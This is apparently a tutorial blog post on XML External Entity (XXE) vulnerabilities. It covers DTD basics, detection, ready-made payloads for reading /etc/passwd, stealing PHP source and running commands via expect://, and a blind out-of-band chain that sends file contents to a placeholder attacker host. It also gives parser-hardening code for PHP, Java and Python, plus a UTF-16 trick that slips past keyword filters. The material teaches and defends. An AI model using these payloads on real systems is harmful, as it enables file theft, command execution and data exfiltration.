[WEB security] XXE vulnerability summary

0x00 XML basics

Before getting into the XXE vulnerability, a quick refresher on XML. XML is designed to transmit and store data: its focus is the data itself, which is what separates it from HTML (whose focus is presentation). It is a software- and hardware-independent way to carry structured information.

0x01 XML document structure

An XML document consists of the XML declaration, an optional DTD (Document Type Definition), and the document element(s):

<?xml version="1.0"?>                   <!-- XML declaration (must come first) -->
<!-- Document type definition -->
<!DOCTYPE note [                        <!-- declares this document to be of type note -->
<!ELEMENT note (to,from,head,body)>     <!-- note contains these four child elements, in order -->
<!ELEMENT to (#PCDATA)>                 <!-- to is parsed character data -->
<!ELEMENT from (#PCDATA)>               <!-- from is parsed character data -->
<!ELEMENT head (#PCDATA)>               <!-- head is parsed character data -->
<!ELEMENT body (#PCDATA)>               <!-- body is parsed character data -->
]>
<!-- Document element -->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

Because the XXE vulnerability is rooted in the DTD, the rest of this section concentrates on DTD concepts.

0x02 DTD

A Document Type Definition (DTD) defines the legal building blocks of an XML document: it lists the elements the document may contain and how they are structured. A DTD can be declared inline in the XML document (an internal DTD) or referenced from an external file.

1. Internal DTD declaration:
<!DOCTYPE root-element [element declarations]>

2. Reference to an external DTD:
<!DOCTYPE root-element SYSTEM "filename-or-URI">

Keywords in a DTD that matter for what follows:

  • DOCTYPE (DTD declaration)
  • ENTITY (entity declaration)
  • SYSTEM, PUBLIC (reference to an external resource)

0x03 Entities

An entity can be understood as a variable: it must be declared in the DTD, and its value can then be referenced elsewhere in the document. By type, entities fall into four categories:

  • Built-in entities
  • Character entities
  • General entities
  • Parameter entities

By where their content comes from, entities are further divided into internal and external entities. Below is how each kind is declared.
For the complete list of entity types see DTD - Entities ( https://www.tutorialspoint.com/dtd/dtd_entities.htm ).

3.1 Entity types

Parameter entities are declared with a % before the name (<!ENTITY % name ...>) and are also referenced with %, as %name;. The other entity types are declared without % and are referenced as &name;.
Parameter entities can only be declared in the DTD and can only be referenced inside the DTD; the other types are declared in the DTD but referenced in the XML document body.

(1) Internal entity:

<!ENTITY entity-name "entity-value">

(2) External entity:

<!ENTITY entity-name SYSTEM "URI">

(3) Parameter entity:

<!ENTITY % entity-name "entity-value">
or
<!ENTITY % entity-name SYSTEM "URI">

(4) Example: internal entity, referenced from the document body (a general entity, not a parameter entity)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "This is a xxe test!">]>
<foo>
<value>&name;</value>
</foo>

(5) Example: external entity declared as a parameter entity and referenced inside the DTD

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % name SYSTEM "file:///etc/passwd">
%name;
]>

Note: %name; (a parameter entity) is referenced inside the DTD, while &name; (any other entity type) is referenced in the XML document body.
Since the XXE vulnerability comes from external entity references in the DTD, the next question is what an external entity can point to.

3.2 External entities in the DTD

<!ENTITY entity-name SYSTEM "URI">

This syntax declares an external entity (as opposed to an internal one). What can the URI point to?
Mainly file, http, https and ftp; the exact set of supported schemes depends on the XML library and language. PHP's libxml, for instance, resolves entity URIs through PHP's stream wrappers, which is why php:// and (when the extension is loaded) expect:// appear in the payloads later in this article.

Example:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name SYSTEM "file:///etc/passwd">]>
<foo>
<value>&name;</value>
</foo>

0x04 XXE vulnerability

XXE stands for XML External Entity injection.
An XXE vulnerability arises when an application parses XML input without disabling the loading of external entities, so that attacker-controlled entity declarations make the parser fetch arbitrary external resources. The consequences include reading local files, command execution (only in special configurations, see 4.2.3), scanning internal network ports, attacking intranet web sites through the server (SSRF), denial of service, and more.

Typical XXE entry points are any place that accepts XML from the user, most commonly an XML file upload that is handed to a parser without filtering, so that a malicious XML file can be uploaded.

4.1 XXE vulnerability detection

Step 1: check whether the XML you submit is actually parsed:

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE ANY [  
<!ENTITY name "my name is nMask">]>    
<root>&name;</root>

If the page outputs "my name is nMask", the submitted XML is parsed and internal entities are expanded.

Step 2: check whether the parser resolves external entities declared in the DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY % name SYSTEM "http://localhost/index.html">
%name;
]>

Here "localhost" stands for a host you control. Check that host's access log: if the target fetched the referenced resource, it resolves external entities. Because the probe uses a parameter entity referenced inside the DTD, the request is made at parse time and the check works even when the application echoes nothing back.

If external entity references are resolved, an XXE vulnerability is very likely present.

4.2 Exploitation

XXE has many impacts: reading files, command execution (in special configurations), internal port scanning, attacks on intranet web sites, denial of service, and so on.

4.2.1 Read arbitrary files

Since I was testing on Windows, I had it read the contents of test.txt on the C drive.

On Linux, read /etc/passwd and other sensitive files instead.
Whether an arbitrary file read like this succeeds depends not only on the DTD external entity being resolved, but also on the parsed content being echoed back in the response; without an echo you need the out-of-band technique in 4.2.4.
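As an added example (not code from the original article), detection step 1 and the file read from 4.2.1 can be reproduced locally with Python's standard-library xml.sax parser. The payloads are the article's own forms; the "secret" file is a temporary file the example creates itself, standing in for /etc/passwd or C:\test.txt. The parser feature xml.sax.handler.feature_external_ges decides whether external general entities are fetched and expanded: switching it on reproduces the vulnerable behaviour (the default before Python 3.7.1), switching it off is the hardened configuration. The function and class names are this example's own.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


def build_payload(entity_decl: str) -> bytes:
    """Wrap one <!ENTITY ...> declaration in the document skeleton used in
    this article and reference it as &name; inside <value>."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE a [\n"
        f"{entity_decl}\n"
        "]>\n"
        "<foo><value>&name;</value></foo>\n"
    ).encode("utf-8")


class ValueCollector(ContentHandler):
    """Collect the character data that ends up inside <value>...</value>.
    It plays the role of the application echoing parsed content back."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "value":
            self._inside = True

    def endElement(self, name):
        if name == "value":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def parse_value(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse with xml.sax (expat underneath) and return the text of <value>.

    feature_external_ges controls whether external *general* entities such as
    <!ENTITY name SYSTEM "file:///..."> are fetched and expanded. True is the
    vulnerable setting (the default before Python 3.7.1); False is hardened.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = ValueCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def write_secret(content: str) -> str:
    """Create a throwaway file standing in for /etc/passwd or C:\\test.txt
    (constructed sample data for this example, not a real system file)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return path


def run_file_read_demo() -> dict:
    """Detection step 1 (internal entity) plus the file-read payload from 4.2.1,
    run against the vulnerable and the hardened parser configuration."""
    secret_path = write_secret("root:x:0:0:root:/root:/bin/bash")
    try:
        internal = build_payload('<!ENTITY name "my name is nMask">')
        external = build_payload(f'<!ENTITY name SYSTEM "file://{secret_path}">')
        return {
            # internal entities expand no matter how the external setting is set
            "internal": parse_value(internal, resolve_external=False),
            # vulnerable parser: the file contents land in the response
            "vulnerable": parse_value(external, resolve_external=True),
            # hardened parser: the external entity expands to nothing
            "hardened": parse_value(external, resolve_external=False),
        }
    finally:
        os.remove(secret_path)


if __name__ == "__main__":
    for label, text in run_file_read_demo().items():
        print(f"{label:10s} -> {text!r}")
```

The "internal" result comes back identical under both settings, which is exactly why step 1 of the detection only proves that XML is parsed, not that external entities are resolved; the "vulnerable" versus "hardened" results show what step 2 and 4.2.1 actually test for.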

4.2.2 Retrieve page source

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<root>
<name>&xxe;</name>
</root>

The base64 string returned is the source of index.php. The php://filter wrapper is used because raw PHP source contains "<" and other characters that would break the XML the entity is expanded into; base64 keeps the result well-formed.

4.2.3 Execute system commands

Only in special configurations: for example a PHP environment in which the expect extension is loaded into the vulnerable system or into the application that processes the XML. The expect:// wrapper then runs a command and returns its output:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "expect://whoami">]>
<root>
<name>&xxe;</name>
</root>

4.2.4 Blind XXE

With classic XXE, the attacker can only read server-side files when the server echoes parsed content or leaks it in an error message. When there is no echo, blind XXE is used instead: the parser is made to send the data out over an out-of-band channel to a host the attacker controls.
Create test.php (the receiver on the attacker's host) with the following content:

<?php
// Receives the exfiltrated data in the "file" query parameter and stores it.
file_put_contents("test.txt", $_GET['file']);
?>

Create index.php (standing in for the vulnerable application) with the following content:

<?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/test.txt">
<!ENTITY % remote SYSTEM "http://localhost/test.xml">
%remote;
%all;
%send;
]>
EOF;
$data = simplexml_load_string($xml);
echo "<pre>";
print_r($data);
?>

Create test.xml (the external DTD, also hosted on the attacker's host) with the following content:

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/test.php?file=%file;'>">

When http://localhost/index.php is visited, the vulnerable server reads test.txt, requests test.php on the attacker's server with the contents in the query string, and test.php stores what it received in its own test.txt.

The chain works like this: %remote; pulls in test.xml; that external DTD declares %all;, whose replacement text is itself an entity declaration containing %file;; expanding %all; therefore declares %send; with the file contents embedded in the URL, and %send; triggers the HTTP request. A parameter entity reference inside an entity declaration is only permitted in an external DTD, which is why %all; has to be fetched from test.xml rather than written into the internal subset. Because the data travels in a URL, files containing newlines or special characters usually need to be wrapped with php://filter/read=convert.base64-encode/resource=... (as in 4.2.2) to arrive intact.

0x05 A few payloads summarized

Read a local file:

<?xml version="1.0"?>
<!DOCTYPE ANY [
   <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
   <name>&content;</name>
</note>

Run a command (only with the PHP expect extension loaded):

<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY content SYSTEM "expect://id">
]>
<note>
   <name>&content;</name>
</note>

Pull in an attacker-hosted external DTD as a parameter entity and let it do the work (the host in the URL is a placeholder):

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % remote SYSTEM "http://localtion/xxe_file.dtd">
%remote;
]>
<note>
   <name>placeholder</name>
</note>

Contents of xxe_file.dtd (the same out-of-band pattern as test.xml in 4.2.4; the receiver URL is a placeholder):
<!ENTITY % file SYSTEM "file:///etc/flag.txt">
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localtion/?file=%file;'>">
%all;
%send;

0x06 Fixing and defending against XXE

6.1 Use the mechanism your language or library provides to disable external entities

PHP:

libxml_disable_entity_loader(true);
// Deprecated since PHP 8.0: libxml >= 2.9 no longer loads external entities unless
// the application asks for it, so on PHP 8 the main rule is never to pass
// LIBXML_NOENT (or LIBXML_DTDLOAD) to the parser.

JAVA:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Refusing DOCTYPE altogether is the reliable fix; setExpandEntityReferences(false)
// on its own does not stop XXE.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree
# resolve_entities=False stops entity expansion; no_network=True (the default) keeps the
# parser from fetching remote DTDs and entities.
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False, no_network=True))

6.2 Filter the XML submitted by users

Filter the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC. Treat this as a second line of defence only: a string blacklist can be evaded by changing the document's encoding (a UTF-16 payload contains no ASCII "<!DOCTYPE"), while the parser-level settings in 6.1 apply regardless of how the input is encoded.
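As an added example (not from the original article), here are 6.1 and 6.2 side by side using Python's standard-library expat parser: keyword_filter_allows is the blacklist from 6.2 as code, and parse_no_dtd implements the parser-level control from 6.1 by rejecting any DOCTYPE at all (the stdlib counterpart of Java's disallow-doctype-decl feature). The sample documents are constructed for this example; the third one is the article's file-read payload re-encoded as UTF-16, which a byte-level keyword search does not recognise while the parser still sees the DOCTYPE. Function and exception names are this example's own.

```python
import xml.parsers.expat as expat

# The blacklist from 6.2, as byte strings.
BLOCKED_KEYWORDS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


class DoctypeRejected(ValueError):
    """Raised when a document carries a DOCTYPE and therefore could declare entities."""


def keyword_filter_allows(data: bytes) -> bool:
    """6.2 as code: let the document through only if none of the keywords occur
    (case-insensitive byte search, as a typical WAF rule or input filter does)."""
    upper = data.upper()
    return not any(keyword in upper for keyword in BLOCKED_KEYWORDS)


def parse_no_dtd(data: bytes) -> dict:
    """6.1 as code: parse with expat and refuse any DOCTYPE outright.

    No DTD means no entity declarations, so neither a file:// read nor an
    out-of-band parameter entity chain is possible. Returns the element names
    and text the application would go on to use."""
    parser = expat.ParserCreate()  # no encoding given: expat sniffs UTF-8/UTF-16 itself
    tags, text = [], []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = start_doctype
    # Belt and braces: if an external entity is ever referenced, refuse to fetch it
    # (returning 0 makes expat abort with an error instead).
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.StartElementHandler = lambda name, attrs: tags.append(name)
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return {"tags": tags, "text": "".join(text)}


def parser_rejects(data: bytes) -> bool:
    """True when parse_no_dtd refuses the document because of a DOCTYPE."""
    try:
        parse_no_dtd(data)
    except DoctypeRejected:
        return True
    return False


def compare_defences() -> dict:
    """Run the keyword filter and the DOCTYPE-rejecting parser over constructed inputs."""
    clean = b'<?xml version="1.0"?><root><value>hello</value></root>'
    xxe = (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE a [<!ENTITY name SYSTEM "file:///etc/passwd">]>'
        b"<root><value>&name;</value></root>"
    )
    # The same payload re-encoded as UTF-16 with a BOM. An ASCII byte search no longer
    # finds "<!DOCTYPE" (every letter is now followed by a NUL byte), but expat reads
    # the BOM and still sees the DOCTYPE.
    xxe_utf16 = xxe.decode("ascii").encode("utf-16")
    return {
        "clean_filter_allows": keyword_filter_allows(clean),
        "clean_parser_rejects": parser_rejects(clean),
        "xxe_filter_allows": keyword_filter_allows(xxe),
        "xxe_parser_rejects": parser_rejects(xxe),
        "utf16_filter_allows": keyword_filter_allows(xxe_utf16),
        "utf16_parser_rejects": parser_rejects(xxe_utf16),
    }


if __name__ == "__main__":
    for label, result in compare_defences().items():
        print(f"{label:22s} {result}")
```

The keyword filter and the parser agree on the plain and the plain-UTF-8 XXE documents; they disagree on the UTF-16 one, which is the case that matters: the decision has to be made by the component that actually decodes the input, not by a string match in front of it.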

0x07 Bypassing XXE protections

(My head is a bit fuzzy today; I'll continue this tomorrow.)


Origin www.cnblogs.com/-mo-/p/11261584.html